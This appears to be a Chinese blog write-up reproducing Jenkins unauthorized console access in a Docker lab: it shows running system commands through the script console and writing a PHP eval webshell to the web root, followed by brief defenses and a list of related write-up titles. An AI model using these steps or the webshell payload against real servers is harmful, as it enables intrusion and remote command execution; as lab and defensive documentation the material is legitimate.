一、漏洞描述

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

二、漏洞环境搭建

docker pull docker.io/jenkins

开启服务(我执行的第一条命令即可)

How to use this image

docker run -p 8080:8080 -p 50000:50000 jenkins

This will store the workspace in /var/jenkins_home. All Jenkins data lives in there - including plugins and configuration. You will probably want to make that a persistent volume (recommended):

docker run -p 8080:8080 -p 50000:50000 -v /your/home:/var/jenkins_home jenkins

This will store the jenkins data in /your/home on the host. Ensure that /your/home is accessible by the jenkins user in container (jenkins user - uid 1000) or use -u some_other_user parameter with docker run.

You can also use a volume container:

docker run --name myjenkins -p 8080:8080 -p 50000:50000 -v /var/jenkins_home jenkins

Then myjenkins container has the volume (please do read about docker volume handling to find out more).

三、漏洞复现

1、浏览器访问http://192.168.8.24:8080/manage,可以看到没有做任何限制,可以直接访问

2、点击”脚本命令行”(http://192.168.8.24:8080/script)

3、执行shell系统命令:println "uname -a".execute().text

4、利用”脚本命令行”上传webshell,内容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

5、点击“运行”,没有报错,上传成功

6、菜刀连接

四、漏洞防御

1、对后台控制页面做登录验证限制

2、升级版本

五、参考文章

https://www.cnblogs.com/yuzly/p/11255609.html

jenkins未授权访问漏洞记录(端口:7001,80,8080,50000)相关推荐

  1. Redis未授权访问漏洞记录(端口:6379)

    目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 ​ 写入/etc/passwd文件 利用主从复制RCE ​ 本地Red ...

  2. MongoDB未授权访问漏洞记录(端口:27017,37017)

    一.漏洞危害 对外开放的MongoDB服务,未配置访问认证授权,无需认证连接数据库后对数据库进行任意操作(增.删.改.查高危动作),存在严重的数据泄露风险. 二.漏洞成因 MongoDB服务安装后,默 ...

  3. PHP-FPM Fastcgi 未授权访问漏洞(端口9000)

    漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道.HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组 ...

  4. docker remote api未授权访问漏洞(端口:2375)

    漏洞介绍: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作docker. docker ...

  5. Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)

    1. 漏洞介绍及危害 Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录.Rsync 默认允许匿 ...

  6. CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636)复现失败

    复现exp失败 漏洞简介以及危害 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript ...

  7. Jboss未授权访问漏洞记录(影响版本:全版本,端口:80,8080)

    一.前言 漏洞原因:在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码. 二.环境配置 使用docker搭建环境 ...

  8. Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)

    Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能 ...

  9. ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)

    漏洞简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件.它是一个为分布式应用提供一致性服务的软件 ...

最新文章

  1. python 读取csv文件生成散点图
  2. 数组-移除元素(交换移除)
  3. java链表寻找中间节点
  4. linux svn强制注释,svn强制提交时添加注释
  5. 计算机强化课程计算机网络,大学计算机网络技术课程教学改革
  6. android 两端对齐,LinearLayout子控件两端对齐
  7. 2.1.3码元、波特、速率、带宽
  8. 【转】Rhythm Of The Rain 雨的旋律
  9. 【Linux】Linux中变量#,@,0,1,2,*,$$,$?的解释
  10. ElasticSearch启动报错at least one of [discovery.seed_hosts, discovery.seed_provid---ElasticSearch工作笔记032
  11. java课程设计文档_Java课程设计-文档相似性检查系统(完整)测试版
  12. Unity3d美颜滤镜
  13. 树莓派接入VGA显示器画面不全偏左的问题与VGA转HDMI连接显示器无法输出声音的解决
  14. 2013 中国15大云平台
  15. 分块矩阵乘法以及求逆应用
  16. macbook卡在进度条开不了机_Mac 开机停在进度条解决方法
  17. 网络安全——病毒详解以及批处理01(自启动,修改密码 定时关机,蓝屏,进程关闭)
  18. 苹果手机科学计算机怎样调用,iOS上的表达式科学计算器Calculator i++使用说明
  19. 阿里云ECS七天训练营-搭建FTP
  20. 2021.1.15——星露谷作物计算器的小改进

热门文章

  1. ​北京大学吴华君课题组高新诚聘 医学生信 助理研究员和博士后
  2. 部分植物基因组数据库汇总
  3. Digital Text Animations for Mac - 未来感活力全屏标题动画fcpx插件
  4. FCPX插件:半调图像高级马赛克特效Yanobox Mosaic
  5. P2249 【深基13.例1】查找(AC) 2022.1.28
  6. 十大常用个人linux,Linux—常用十大命令
  7. 水文特点是什么意思_水文监测仪器设备简介
  8. python两个编程环境_多个python Behave环境安装文件
  9. 刀剑神域动漫网页设计作品 学生表格布局网页作业成品 table漫画网站制作 dreamweaver静态HTML学生网页制作模板
  10. postman安装路径_Newman进行postman脚本自动化